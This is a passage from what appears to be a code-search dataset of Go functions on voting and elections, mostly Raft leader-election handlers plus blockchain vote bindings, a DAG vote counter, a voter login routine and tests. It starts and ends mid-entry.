event:\n\t\t\t\tcase err := <-sub.Err():\n\t\t\t\t\treturn err\n\t\t\t\tcase <-quit:\n\t\t\t\t\treturn nil\n\t\t\t\t}\n\t\t\tcase err := <-sub.Err():\n\t\t\t\treturn err\n\t\t\tcase <-quit:\n\t\t\t\treturn nil\n\t\t\t}\n\t\t}\n\t}), nil\n}", "func TestLeaderElectionOverwriteNewerLogs(t *testing.T) {\n\ttestLeaderElectionOverwriteNewerLogs(t, false)\n}", "func (_Votes *VotesTransactor) VoteCandidate(opts *bind.TransactOpts, addrCandidate common.Address) (*types.Transaction, error) {\n\treturn _Votes.contract.Transact(opts, \"voteCandidate\", addrCandidate)\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\tDPrintf(\"Raft node (%d) handles with RequestVote, candidateId: %v\\n\", rf.me, args.CandidateId)\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\treply.Term = rf.currentTerm\n\treply.PeerId = rf.me\n\n\tif rf.currentTerm == args.Term && rf.votedFor != -1 && rf.votedFor != args.CandidateId {\n\t\tDPrintf(\"Raft node (%v) denied vote, votedFor: %v, candidateId: %v.\\n\", rf.me,\n\t\t\trf.votedFor, args.CandidateId)\n\t\treply.VoteGranted = false\n\t\treturn\n\t}\n\n\tlastLogIndex := len(rf.logs) - 1\n\tlastLogEntry := rf.logs[lastLogIndex]\n\tif lastLogEntry.Term > args.LastLogTerm || lastLogIndex > args.LastLogIndex {\n\t\t// If this node is more up-to-date than candidate, then reject vote\n\t\t//DPrintf(\"Raft node (%v) LastLogIndex: %v, LastLogTerm: %v, args (%v, %v)\\n\", rf.me,\n\t\t//\tlastLogIndex, lastLogEntry.Term, args.LastLogIndex, args.LastLogTerm)\n\t\treply.VoteGranted = false\n\t\treturn\n\t}\n\n\trf.tryEnterFollowState(args.Term)\n\n\trf.currentTerm = args.Term\n\trf.votedFor = args.CandidateId\n\treply.VoteGranted = true\n}", "func LoginVoter(electionID, username, password, safeword string, dbc *mongo.Client) (VoterLogin, error) {\r\n\tresult := voter{}\r\n\terr := dbc.Database(\"aye-go\").Collection(\"voter\").\r\n\t\tFindOne(context.Background(), bson.M{\"username\": username}).Decode(&result)\r\n\tif err != nil {\r\n\t\treturn VoterLogin{false, false, \"\"}, err\r\n\t}\r\n\thashpass := md5.Sum([]byte(password + result.Hash))\r\n\tif result.Password != fmt.Sprintf(\"%x\", hashpass) {\r\n\t\treturn VoterLogin{false, false, \"\"}, nil\r\n\t}\r\n\r\n\tif !result.HasVoted { // check safeword\r\n\t\tres, err := GetOneResult(electionID, username, safeword, dbc)\r\n\t\tif err != nil {\r\n\t\t\treturn VoterLogin{false, false, \"\"}, nil\r\n\t\t}\r\n\t\tif len(res) > 0 { //username+safeword has been used - \"has voted\" (was coerced, so fake thiss)\r\n\t\t\tresult.HasVoted = true\r\n\t\t}\r\n\t}\r\n\treturn VoterLogin{true, result.HasVoted, result.ID.Hex()}, nil\r\n}", "func (tester* FreezeTester) nonBpVote(t *testing.T, d *Dandelion) {\n\ta := assert.New(t)\n\ta.True(d.Contract(constants.COSSysAccount, frCrtName).CheckExist())\n\tfreezeAcct := tester.acc5\n\tsta := freezeAcct.GetFreeze()\n\tmemo := freezeAcct.GetFreezeMemo()\n\tnewSta := tester.mdFreezeStatus(sta)\n\ta.NotEqual(sta, newSta)\n\tmemoArray,nameArray := tester.getProposalMemoAndNameParams(d,[]*DandelionAccount{freezeAcct})\n\n\t//1.proposal\n\tApplyNoError(t, d, fmt.Sprintf(\"%s: %s.%s.proposalfreeze %s,%d,%s\", tester.acc0.Name, constants.COSSysAccount, frCrtName, nameArray, newSta, memoArray))\n\t//2.fetch proposal_id\n\tpropId,err := tester.getProposalId(d)\n\ta.NoError(err)\n\t//less than 2/3 bp vote to proposalId\n\ttester.voteById(t, d, propId, 0, tester.threshold-1)\n\t//non bp vote\n\tApplyError(t, d, fmt.Sprintf(\"%s: %s.%s.vote %v\", tester.acc4.Name, constants.COSSysAccount, frCrtName, propId))\n\t//final vote fail, set freeze fail\n\ta.Equal(sta, freezeAcct.GetFreeze())\n\ta.Equal(memo, freezeAcct.GetFreezeMemo())\n\n}", "func (rf *Raft) RequestVote(args RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here.\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\tbbit := true\n\tif len(rf.log) > 0 {\n\t\tlastLogTerm := rf.log[len(rf.log)-1].Term\n\t\tif lastLogTerm > args.LastLogTerm {\n\t\t\tbbit = false\n\t\t} else if lastLogTerm == args.LastLogTerm &&\n\t\t\tlen(rf.log)-1 > args.LastLogIndex {\n\t\t\tbbit = false\n\t\t}\n\t}\n\n\tif args.Term < rf.currentTerm {\n\t\treply.Term = rf.currentTerm\n\t\treply.VoteGranted = false\n\t\treturn\n\t}\n\tif args.Term == rf.currentTerm {\n\t\treply.Term = rf.currentTerm\n\t\tif rf.votedFor == -1 && bbit {\n\t\t\trf.votedFor = args.CandidateId\n\t\t\trf.persist()\n\t\t\treply.VoteGranted = true\n\t\t} else {\n\t\t\treply.VoteGranted = false\n\t\t}\n\t\treturn\n\t}\n\tif args.Term > rf.currentTerm {\n\t\trf.state = FOLLOWER\n\t\trf.currentTerm = args.Term\n\t\trf.votedFor = -1\n\t\trf.timer.Reset(properTimeDuration(rf.state))\n\t\treply.Term = args.Term\n\t\tif bbit {\n\t\t\trf.votedFor = args.CandidateId\n\t\t\trf.persist()\n\t\t\treply.VoteGranted = true\n\t\t} else {\n\t\t\treply.VoteGranted = false\n\t\t}\n\t\treturn\n\t}\n\treturn\n}", "func GenVotes(hash []byte, round uint64, step uint8, keys []key.ConsensusKeys, p *user.Provisioners) []*StepVotes {\n\tif len(keys) < 2 {\n\t\tpanic(\"At least two votes are required to mock an Agreement\")\n\t}\n\n\t// Create committee key sets\n\tkeySet1 := createCommitteeKeySet(p.CreateVotingCommittee(round, step-2, len(keys)), keys)\n\tkeySet2 := createCommitteeKeySet(p.CreateVotingCommittee(round, step-1, len(keys)), keys)\n\n\tstepVotes1, set1 := createStepVotesAndSet(hash, round, step-2, keySet1)\n\tstepVotes2, set2 := createStepVotesAndSet(hash, round, step-1, keySet2)\n\n\tbitSet1 := createBitSet(set1, round, step-2, len(keySet1), p)\n\tstepVotes1.BitSet = bitSet1\n\tbitSet2 := createBitSet(set2, round, step-1, len(keySet2), p)\n\tstepVotes2.BitSet = bitSet2\n\n\treturn []*StepVotes{stepVotes1, stepVotes2}\n}", "func (t *Tortoise) TallyVotes(ctx context.Context, lid types.LayerID) {\n\tstart := time.Now()\n\tt.mu.Lock()\n\tdefer t.mu.Unlock()\n\twaitTallyVotes.Observe(float64(time.Since(start).Nanoseconds()))\n\tstart = time.Now()\n\tt.trtl.onLayer(ctx, lid)\n\texecuteTallyVotes.Observe(float64(time.Since(start).Nanoseconds()))\n\tif t.tracer != nil {\n\t\tt.tracer.On(&TallyTrace{Layer: lid})\n\t}\n}", "func (r *Raft) candidate(timeout int) int {\n\twaitTime := timeout //added for passing timeout from outside--In SingleServerBinary\n\tresendTime := 5 //should be much smaller than waitTime\n\tElectionTimer := r.StartTimer(ElectionTimeout, waitTime)\n\t//This loop is for election process which keeps on going until a leader is elected\n\tfor {\n\t\t//reset the Votes else it will reflect the Votes received in last Term\n\t\tr.resetVotes()\n\t\tr.myCV.CurrentTerm += 1 //increment current Term\n\t\tr.myCV.VotedFor = r.Myconfig.Id //Vote for self\n\t\tr.WriteCVToDisk() //write Current Term and VotedFor to disk\n\t\tr.f_specific[r.Myconfig.Id].Vote = true //vote true\n\t\treqVoteObj := r.prepRequestVote() //prepare request Vote obj\n\t\tr.sendToAll(reqVoteObj) //send requests for Vote to all servers\n\t\tResendVoteTimer := r.StartTimer(ResendVoteTimeOut, resendTime)\n\t\tfor { //this loop for reading responses from all servers\n\t\t\treq := r.receive()\n\t\t\tswitch req.(type) {\n\t\t\tcase ClientAppendReq: ///candidate must also respond as false just like follower\n\t\t\t\trequest := req.(ClientAppendReq) //explicit typecasting\n\t\t\t\tresponse := ClientAppendResponse{}\n\t\t\t\tlogItem := LogItem{r.CurrentLogEntryCnt, false, request.Data} //lsn is count started from 0\n\t\t\t\tr.CurrentLogEntryCnt += 1\n\t\t\t\tresponse.LogEntry = logItem\n\t\t\t\tr.CommitCh <- &response.LogEntry\n\t\t\tcase RequestVoteResponse: //got the Vote response\n\t\t\t\tresponse := req.(RequestVoteResponse) //explicit typecasting so that fields of struct can be used\n\t\t\t\tif response.VoteGranted {\n\t\t\t\t\tr.f_specific[response.Id].Vote = true\n\t\t\t\t}\n\t\t\t\tVoteCount := r.countVotes()\n\t\t\t\tif VoteCount >= majority {\n\t\t\t\t\tResendVoteTimer.Stop()\n\t\t\t\t\tElectionTimer.Stop()\n\t\t\t\t\tr.LeaderConfig.Id = r.Myconfig.Id //update leader details\n\t\t\t\t\treturn leader //become the leader\n\t\t\t\t}\n\n\t\t\tcase AppendEntriesReq: //received an AE request instead of Votes, i.e. some other leader has been elected\n\t\t\t\trequest := req.(AppendEntriesReq)\n\t\t\t\tretVal := r.serviceAppendEntriesReq(request, nil, 0, candidate)\n\t\t\t\tif retVal == follower {\n\t\t\t\t\tResendVoteTimer.Stop()\n\t\t\t\t\tElectionTimer.Stop()\n\t\t\t\t\treturn follower\n\t\t\t\t}\n\n\t\t\tcase RequestVote:\n\t\t\t\trequest := req.(RequestVote)\n\t\t\t\t//==Can be shared with service request vote with additinal param of caller(candidate or follower)\n\t\t\t\tresponse := RequestVoteResponse{} //prep response object,for responding back to requester\n\t\t\t\tcandidateId := request.CandidateId\n\t\t\t\tresponse.Id = r.Myconfig.Id\n\t\t\t\tif r.isDeservingCandidate(request) {\n\t\t\t\t\tresponse.VoteGranted = true\n\t\t\t\t\tr.myCV.VotedFor = candidateId\n\t\t\t\t\tr.myCV.CurrentTerm = request.Term\n\t\t\t\t\tif request.Term > r.myCV.CurrentTerm { //write to disk only when value has changed\n\t\t\t\t\t\tr.WriteCVToDisk()\n\t\t\t\t\t}\n\t\t\t\t\tResendVoteTimer.Stop()\n\t\t\t\t\tElectionTimer.Stop()\n\t\t\t\t\treturn follower\n\t\t\t\t} else {\n\t\t\t\t\tresponse.VoteGranted = false\n\t\t\t\t}\n\t\t\t\tresponse.Term = r.myCV.CurrentTerm\n\t\t\t\tr.send(candidateId, response)\n\n\t\t\tcase int:\n\t\t\t\ttimeout := req.(int)\n\t\t\t\tif timeout == ResendVoteTimeOut {\n\t\t\t\t\trT := msecs * time.Duration(resendTime)\n\t\t\t\t\tResendVoteTimer.Reset(rT)\n\t\t\t\t\treqVoteObj := r.prepRequestVote() //prepare request Vote agn and send to all, ones rcvg the vote agn will vote true agn so won't matter and countVotes func counts no.of true entries\n\t\t\t\t\tr.sendToAll(reqVoteObj)\n\t\t\t\t} else if timeout == ElectionTimeout {\n\t\t\t\t\twaitTime_msecs := msecs * time.Duration(waitTime)\n\t\t\t\t\tElectionTimer.Reset(waitTime_msecs)\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n}", "func (sp *Spectre) updateVotes(votedPast *BlockDAG, vh hash.Hash) bool {\n\t// test if all parents being voted\n\tcanUpdate := true\n\tmaxVotes := -1\n\tmaxParent := new(SpectreBlock)\n\n\t// increase votedPast with new nodes, only happening on updating votes in candidates' past sets\n\tif !votedPast.hasBlockById(votedPast.getBlock(&vh).GetID()) {\n\t\tvhChildren := sp.bd.getBlock(&vh).GetChildren()\n\t\tfor id, ch := range vhChildren.GetMap() {\n\t\t\tif !votedPast.hasBlockById(id) && !sp.hasVoted(*ch.(IBlock).GetHash()) {\n\t\t\t\tcanUpdate = false\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\tif canUpdate {\n\t\t\tsp.newVoter(vh, votedPast)\n\t\t} else {\n\t\t\treturn false\n\t\t}\n\t}\n\tparents := votedPast.getBlock(&vh).GetParents()\n\n\tif parents == nil || parents.Size() == 0 {\n\t\tlog.Error(\"no parents of \", vh)\n\t}\n\n\t// max parent has more nodes in its future set, which means more votes to inherit\n\tfor id, ph := range parents.GetMap() {\n\t\tif ph.(IBlock).GetHash().IsEqual(votedPast.getGenesis().GetHash()) {\n\t\t\tcontinue\n\t\t}\n\t\tb := votedPast.getBlockById(id)\n\t\tsb := votedPast.instance.(*Spectre).sblocks[*b.GetHash()]\n\t\tif sb.Votes1 < 0 || sb.Votes2 < 0 {\n\t\t\tcanUpdate = false\n\t\t\tbreak\n\t\t}\n\t\tvotes := sb.Votes2 + sb.Votes1\n\t\tif votes > maxVotes {\n\t\t\tmaxVotes = votes\n\t\t\tmaxParent = sb\n\t\t}\n\t}\n\n\tif canUpdate {\n\t\t// first step, inherit votes from max voter\n\t\tb := votedPast.getBlock(&vh)\n\t\tvoter := votedPast.instance.(*Spectre).sblocks[*b.GetHash()]\n\n\t\tvoter.Votes1, voter.Votes2 = maxParent.Votes1, maxParent.Votes2\n\n\t\t// if it can be updated, it MUST be updated\n\t\tif maxParent == nil || maxParent.hash.IsEqual(&hash.Hash{}) {\n\t\t\tlog.Error(vh.String())\n\t\t}\n\n\t\t// Note: results in s is constant, so we must reference them in the first place\n\t\t// then we compare its votes between candidate 1 and 2\n\t\tif sp.hasVoted(*maxParent.GetHash()) {\n\t\t\tv := sp.votes[*maxParent.GetHash()]\n\t\t\tif v {\n\t\t\t\tvoter.Votes1 += 1\n\t\t\t} else {\n\t\t\t\tvoter.Votes2 += 1\n\t\t\t}\n\t\t} else {\n\t\t\tif maxParent.Votes2 > maxParent.Votes1 {\n\t\t\t\tvoter.Votes2 += 1\n\t\t\t} else if maxParent.Votes2 < maxParent.Votes1 {\n\t\t\t\tvoter.Votes1 += 1\n\t\t\t}\n\t\t}\n\n\t\t// second, add votes from other voters\n\t\tif b.GetParents().Size() > 1 {\n\t\t\tsp.updateTipVotes(voter, maxParent, votedPast)\n\t\t}\n\t}\n\treturn canUpdate\n}", "func (rf *Raft) runElection() {\n\t// get election start time\n\tlastElectionCheck := time.Now()\n\n\trf.mu.Lock()\n\trf.currentTerm++\n\t// persist - updated current term\n\tdata := rf.GetStateBytes(false)\n\trf.persister.SaveRaftState(data)\n\trf.Log(LogInfo, \"running as candidate\")\n\n\t// set as candidate state and vote for ourselves,\n\t// also reset the timer\n\trf.votedFor = rf.me\n\trf.state = Candidate\n\trf.electionTimeout = GetRandomElectionTimeout()\n\n\t// for holding replies - we send out the requests concurrently\n\treplies := make([]*RequestVoteReply, len(rf.peers))\n\tfor servIdx := range rf.peers {\n\t\treplies[servIdx] = &RequestVoteReply{}\n\t}\n\n\t// send out requests concurrently\n\tfor servIdx := range rf.peers {\n\t\tif servIdx != rf.me {\n\t\t\targs := &RequestVoteArgs{\n\t\t\t\tCandidateTerm: rf.currentTerm,\n\t\t\t}\n\n\t\t\t// grab last log index and term - default to snapshot if log is []\n\t\t\tif len(rf.log) > 0 {\n\t\t\t\targs.LastLogIndex = rf.log[len(rf.log)-1].Index\n\t\t\t\targs.LastLogTerm = rf.log[len(rf.log)-1].Term\n\t\t\t} else {\n\t\t\t\targs.LastLogIndex = rf.lastIncludedIndex\n\t\t\t\targs.LastLogTerm = rf.lastIncludedTerm\n\t\t\t}\n\t\t\t// only place the reply into replies, when the RPC completes,\n\t\t\t// to prevent partial data (unsure if this can happen but seems like a good idea)\n\t\t\tgo func(servIdx int) {\n\t\t\t\treply := &RequestVoteReply{}\n\t\t\t\trf.Log(LogDebug, \"Sending RequestVote to servIdx\", servIdx)\n\t\t\t\tok := rf.sendRequestVote(servIdx, args, reply)\n\t\t\t\tif ok {\n\t\t\t\t\trf.Log(LogDebug, \"Received RequestVote reply from server\", servIdx, \"\\n - reply\", reply)\n\t\t\t\t\treplies[servIdx] = reply\n\t\t\t\t}\n\t\t\t}(servIdx)\n\t\t}\n\t}\n\trf.mu.Unlock()\n\n\t// while we still have time on the clock, poll\n\t// for election result\n\tfor !rf.killed() {\n\t\trf.mu.Lock()\n\t\tif rf.state == Follower {\n\t\t\trf.Log(LogInfo, \"now a follower\")\n\t\t\t// we must have received a heartbeat message from a new leader\n\t\t\t// stop the election\n\t\t\trf.mu.Unlock()\n\t\t\treturn\n\t\t} else if rf.electionTimeout > 0 {\n\t\t\t// election still running\n\t\t\t// do a vote count and update time remaining\n\t\t\tcurrentTime := time.Now()\n\t\t\trf.electionTimeout -= (currentTime.Sub(lastElectionCheck))\n\t\t\tlastElectionCheck = currentTime\n\t\t\tvotes := 1 // we vote for ourselves automatically\n\t\t\tfor servIdx := range rf.peers {\n\t\t\t\t// need a successful vote AND need that our term hasn't increased (e.g. if\n\t\t\t\t// since the last loop, we voted for a server with a higher term)\n\t\t\t\tif servIdx != rf.me && replies[servIdx].VoteGranted && replies[servIdx].CurrentTerm == rf.currentTerm {\n\t\t\t\t\tvotes++\n\t\t\t\t}\n\t\t\t}\n\t\t\t// majority vote achieved - set state as leader and\n\t\t\t// start sending heartbeats\n\t\t\tif votes >= int(math.Ceil(float64(len(rf.peers))/2.0)) {\n\t\t\t\trf.Log(LogInfo, \"elected leader\", \"\\n - rf.log:\", rf.log, \"\\n - rf.commitIndex\", rf.commitIndex)\n\t\t\t\trf.state = Leader\n\n\t\t\t\t// get next index of the log for rf.nextIndex\n\t\t\t\tnextIdx := rf.lastIncludedIndex + 1\n\t\t\t\tif len(rf.log) > 0 {\n\t\t\t\t\tnextIdx = rf.log[len(rf.log)-1].Index + 1\n\t\t\t\t}\n\n\t\t\t\t// this volatile state is reinitialized on election\n\t\t\t\tfor servIdx := range rf.peers {\n\t\t\t\t\tif servIdx != rf.me {\n\t\t\t\t\t\trf.nextIndex[servIdx] = nextIdx\n\t\t\t\t\t\trf.matchIndex[servIdx] = 0\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\trf.mu.Unlock()\n\t\t\t\tgo rf.heartbeatAppendEntries()\n\t\t\t\treturn\n\t\t\t}\n\t\t} else {\n\t\t\t// no result - need to rerun election\n\t\t\trf.Log(LogInfo, \"timed out as candidate\")\n\t\t\trf.mu.Unlock()\n\t\t\tgo rf.runElection()\n\t\t\treturn\n\t\t}\n\t\trf.mu.Unlock()\n\t\ttime.Sleep(defaultPollInterval)\n\t}\n}", "func (w *pollWorker) compareVote(vote1, vote2 VoteMsg) common.CompareResult {\n\n\t// Vote with the larger epoch always is larger\n\tresult := common.CompareEpoch(vote1.GetEpoch(), vote2.GetEpoch())\n\n\tif result == common.MORE_RECENT {\n\t\treturn common.GREATER\n\t}\n\n\tif result == common.LESS_RECENT {\n\t\treturn common.LESSER\n\t}\n\n\t// If a candidate has a larger logged txid, it means the candidate\n\t// has processed more proposals. This vote is larger.\n\tif vote1.GetCndLoggedTxnId() > vote2.GetCndLoggedTxnId() {\n\t\treturn common.GREATER\n\t}\n\n\tif vote1.GetCndLoggedTxnId() < vote2.GetCndLoggedTxnId() {\n\t\treturn common.LESSER\n\t}\n\n\t// This candidate has the same number of proposals in his committed log as\n\t// the other one. But if a candidate has a larger committed txid,\n\t// it means this candidate also has processed more commit messages from the\n\t// previous leader. This vote is larger.\n\tif vote1.GetCndCommittedTxnId() > vote2.GetCndCommittedTxnId() {\n\t\treturn common.GREATER\n\t}\n\n\tif vote1.GetCndCommittedTxnId() < vote2.GetCndCommittedTxnId() {\n\t\treturn common.LESSER\n\t}\n\n\t// All else is equal (e.g. during inital system startup -- repository is emtpy),\n\t// use the ip address.\n\tif vote1.GetCndId() > vote2.GetCndId() {\n\t\treturn common.GREATER\n\t}\n\n\tif vote1.GetCndId() < vote2.GetCndId() {\n\t\treturn common.LESSER\n\t}\n\n\treturn common.EQUAL\n}", "func (r *raftState) removeVoter(addr string) error {\n\n\t// Only do this on the leader\n\tif !r.isLeader() {\n\t\treturn raft.ErrNotLeader\n\t}\n\n\tconfigFuture := r.raft.GetConfiguration()\n\tif err := configFuture.Error(); err != nil {\n\t\tr.logger.Info(\"failed to get raft configuration\", \"error\", err)\n\t\treturn err\n\t}\n\n\tfor _, srv := range configFuture.Configuration().Servers {\n\t\t// If a node already exists with either the joining node's ID or address,\n\t\t// that node may need to be removed from the config first.\n\t\tif srv.Address == raft.ServerAddress(addr) {\n\t\t\tfuture := r.raft.RemoveServer(srv.ID, 0, 0)\n\t\t\tif err := future.Error(); err != nil {\n\t\t\t\treturn fmt.Errorf(\"error removing existing node %s at %s: %s\", srv.ID, addr, err)\n\t\t\t}\n\n\t\t\tbreak\n\t\t}\n\t}\n\n\treturn nil\n}", "func (_Contract *ContractTransactor) Vote(opts *bind.TransactOpts, delegatedTo common.Address, proposalID *big.Int, choices []*big.Int) (*types.Transaction, error) {\n\treturn _Contract.contract.Transact(opts, \"vote\", delegatedTo, proposalID, choices)\n}", "func (_Poll *PollTransactor) Vote(opts *bind.TransactOpts, _choiceID *big.Int) (*types.Transaction, error) {\n\treturn _Poll.contract.Transact(opts, \"vote\", _choiceID)\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\treply.Term = rf.currentTerm\n\treply.VoteGranted = false\n\tDPrintf(\"before voted reply is %v, me id is %d, votedFor is %d, candidateId is %d, current term is %v, \" +\n\t\t\"args term is %v args log is %v log is %v\", reply, rf.me, rf.votedFor, args.CandidateId,\n\t\trf.currentTerm, args.LastLogTerm, args.LastLogIndex, rf.addLastIncludedIndex(len(rf.log)-1))\n\n\tif rf.currentTerm < args.Term {\n\t\trf.votedFor = -1\n\t\trf.currentTerm = args.Term\n\t\trf.raftState = Follower\n\t\trf.resetTimer()\n\t}\n\tif rf.votedFor == args.CandidateId || rf.votedFor == -1 {\n\t\tlastIndex := len(rf.log) - 1\n\t\tlastLogTerm := rf.log[lastIndex].Term\n\t\tif (args.LastLogTerm > lastLogTerm) ||\n\t\t\t(args.LastLogTerm == lastLogTerm && args.LastLogIndex >= rf.addLastIncludedIndex(lastIndex)) {\n\t\t\trf.votedFor = args.CandidateId\n\t\t\trf.raftState = Follower\n\t\t\treply.VoteGranted = true\n\t\t\trf.resetTimer()\n\t\t}\n\t}\n\trf.persist()\n}", "func (r *Raft) runCandidate() {\n\t// Start vote for us, and set a timeout\n\tvoteCh := r.electSelf()\n\telectionTimeout := randomTimeout(r.conf.ElectionTimeout, 2*r.conf.ElectionTimeout)\n\n\t// Tally the votes, need a simple majority\n\tgrantedVotes := 0\n\tquorum := r.quorumSize()\n\tr.logD.Printf(\"Cluster size: %d, votes needed: %d\", len(r.peers)+1, quorum)\n\n\ttransition := false\n\tfor !transition {\n\t\tselect {\n\t\tcase rpc := <-r.rpcCh:\n\t\t\tswitch cmd := rpc.Command.(type) {\n\t\t\tcase *AppendEntriesRequest:\n\t\t\t\ttransition = r.appendEntries(rpc, cmd)\n\t\t\tcase *RequestVoteRequest:\n\t\t\t\ttransition = r.requestVote(rpc, cmd)\n\t\t\tdefault:\n\t\t\t\tr.logE.Printf(\"Candidate state, got unexpected command: %#v\",\n\t\t\t\t\trpc.Command)\n\t\t\t\trpc.Respond(nil, fmt.Errorf(\"unexpected command\"))\n\t\t\t}\n\n\t\t// Got response from peers on voting request\n\t\tcase vote := <-voteCh:\n\t\t\t// Check if the term is greater than ours, bail\n\t\t\tif vote.Term > r.getCurrentTerm() {\n\t\t\t\tr.logD.Printf(\"Newer term discovered\")\n\t\t\t\tr.setState(Follower)\n\t\t\t\tif err := r.setCurrentTerm(vote.Term); err != nil {\n\t\t\t\t\tr.logE.Printf(\"Failed to update current term: %w\", err)\n\t\t\t\t}\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\t// Check if the vote is granted\n\t\t\tif vote.Granted {\n\t\t\t\tgrantedVotes++\n\t\t\t\tr.logD.Printf(\"Vote granted. Tally: %d\", grantedVotes)\n\t\t\t}\n\n\t\t\t// Check if we've become the leader\n\t\t\tif grantedVotes >= quorum {\n\t\t\t\tr.logD.Printf(\"Election won. Tally: %d\", grantedVotes)\n\t\t\t\tr.setState(Leader)\n\t\t\t\treturn\n\t\t\t}\n\t\tcase a := <-r.applyCh:\n\t\t\t// Reject any operations since we are not the leader\n\t\t\ta.response = ErrNotLeader\n\t\t\ta.Response()\n\n\t\tcase <-electionTimeout:\n\t\t\t// Election failed! Restart the election. We simply return,\n\t\t\t// which will kick us back into runCandidate\n\t\t\tr.logW.Printf(\"Election timeout reached, restarting election\")\n\t\t\treturn\n\n\t\tcase <-r.shutdownCh:\n\t\t\treturn\n\t\t}\n\t}\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tif rf.currentTerm > args.Term {\n\t\treply.VoteGranted = false\n\t\treply.Term = rf.currentTerm\n\t\treturn\n\t}\n\n\tif rf.currentTerm < args.Term {\n\t\trf.currentTerm = args.Term\n\t\trf.updateStateTo(FOLLOWER)\n\t\t//妈的咋突然少了段代码~~ 这里要变为follower状态\n\t\t//var wg sync.WaitGroup\n\t\t//wg.Add(1)\n\t\tgo func() {\n\t\t\t//\tdefer wg.Done()\n\t\t\trf.stateChangeCh <- struct{}{}\n\t\t}()\n\n\t\t//wg.Wait()\n\n\t\t//直接return,等待下一轮投票会导致活锁,比如node 1 ,2,3 。 node 1 加term为2,发请求给node2,3,term1。 node2,3更新term拒绝投票\n\t\t//return\n\t}\n\n\t//此处if 在 currentTerm < args.Term下必然成立,在currentTerm等于args.Term下不一定成立\n\n\tif rf.votedFor == -1 || rf.votedFor == args.CandidatedId {\n\t\t//if candidate的log 至少 as up-to-date as reveiver's log\n\t\tlastLogIndex := len(rf.logEntries) - 1\n\t\t//fmt.Println(lastLogIndex,rf.me,rf.logEntries )\n\t\tlastLogTerm := rf.logEntries[len(rf.logEntries)-1].Term\n\t\t//fmt.Println(lastLogIndex,lastLogTerm , args.LastLogIndex,args.LastLogTerm)\n\t\tif lastLogTerm < args.LastLogTerm || (lastLogTerm == args.LastLogTerm && lastLogIndex <= args.LastLogIndex) {\n\t\t\trf.votedFor = args.CandidatedId\n\t\t\treply.Term = rf.currentTerm\n\t\t\treply.VoteGranted = true\n\t\t\t//fmt.Printf(\"[Term %d],Node %d Reply 值为%v. Term= %d , lastIndex = %d <= args.lastLogIndex %d\\n\", rf.currentTerm, rf.me, reply, args.LastLogTerm, lastLogIndex, args.LastLogIndex)\n\t\t\tif rf.status == FOLLOWER {\n\t\t\t\tgo func() { rf.giveVoteCh <- struct{}{} }()\n\t\t\t}\n\t\t\treturn\n\t\t}\n\t\tfmt.Println(lastLogIndex, lastLogTerm, args.LastLogIndex, args.LastLogTerm)\n\t}\n\n\treply.Term = rf.currentTerm\n\treply.VoteGranted = false\n\t//fmt.Printf(\"[Term %d] Node %d Reply 值为%v,rf.votefor=%d,\\n\", rf.currentTerm, rf.me, reply, rf.votedFor)\n\n}", "func (_Contracts *ContractsTransactorSession) Vote(_proposalId *big.Int, _positionId *big.Int, _candidateId *big.Int, _voterId *big.Int) (*types.Transaction, error) {\n\treturn _Contracts.Contract.Vote(&_Contracts.TransactOpts, _proposalId, _positionId, _candidateId, _voterId)\n}", "func (s LoginSession) Vote(v Voter, vote Vote) error {\n\treq := &request{\n\t\turl: \"https://www.reddit.com/api/vote\",\n\t\tvalues: &url.Values{\n\t\t\t\"id\": {v.voteID()},\n\t\t\t\"dir\": {string(vote)},\n\t\t\t\"uh\": {s.modhash},\n\t\t},\n\t\tcookie: s.cookie,\n\t\tuseragent: s.useragent,\n\t}\n\tbody, err := req.getResponse()\n\tif err != nil {\n\t\treturn err\n\t}\n\tif body.String() != \"{}\" {\n\t\treturn errors.New(\"failed to vote\")\n\t}\n\treturn nil\n}", "func (_Contracts *ContractsSession) Vote(_proposalId *big.Int, _positionId *big.Int, _candidateId *big.Int, _voterId *big.Int) (*types.Transaction, error) {\n\treturn _Contracts.Contract.Vote(&_Contracts.TransactOpts, _proposalId, _positionId, _candidateId, _voterId)\n}", "func (_Votes *VotesCaller) TickVote(opts *bind.CallOpts) (bool, error) {\n\tvar (\n\t\tret0 = new(bool)\n\t)\n\tout := ret0\n\terr := _Votes.contract.Call(opts, out, \"tickVote\")\n\treturn *ret0, err\n}", "func TestRGITBasic_TestDeleteRaftLogWhenNewTermElection(t *testing.T) {\n\n\ttestInitAllDataFolder(\"TestRGIT_TestDeleteRaftLogWhenNewTermElection\")\n\traftGroupNodes := testCreateThreeNodes(t, 20*1024*1024)\n\tdefer func() {\n\t\ttestDestroyRaftGroups(raftGroupNodes)\n\t}()\n\tproposeMessages := testCreateMessages(t, 10)\n\ttestDoProposeDataAndWait(t, raftGroupNodes, proposeMessages)\n\n\t// get leader information\n\tleaderNode := testGetLeaderNode(t, raftGroupNodes)\n\tlastIndex, err := leaderNode.storage.LastIndex()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tlastTerm, err := leaderNode.storage.Term(lastIndex)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tt.Logf(\"first propose, last index:%d, last term: %d\\n\", lastIndex, lastTerm)\n\tfmt.Printf(\"first propose, last index:%d, last term: %d\\n\", lastIndex, lastTerm)\n\n\t// stop 2 raft node\n\traftGroupNodes[0].Stop()\n\traftGroupNodes[1].Stop()\n\n\t// insert wrong message(which will be replace by new leader) into the last node\n\twrongMessages := testCreateMessages(t, 20)\n\twrongEntries := make([]raftpb.Entry, 0)\n\n\tfor i, msg := range wrongMessages {\n\t\tb := make([]byte, 8+len(msg))\n\t\tbinary.BigEndian.PutUint64(b, uint64(i+1))\n\t\tcopy(b[8:], 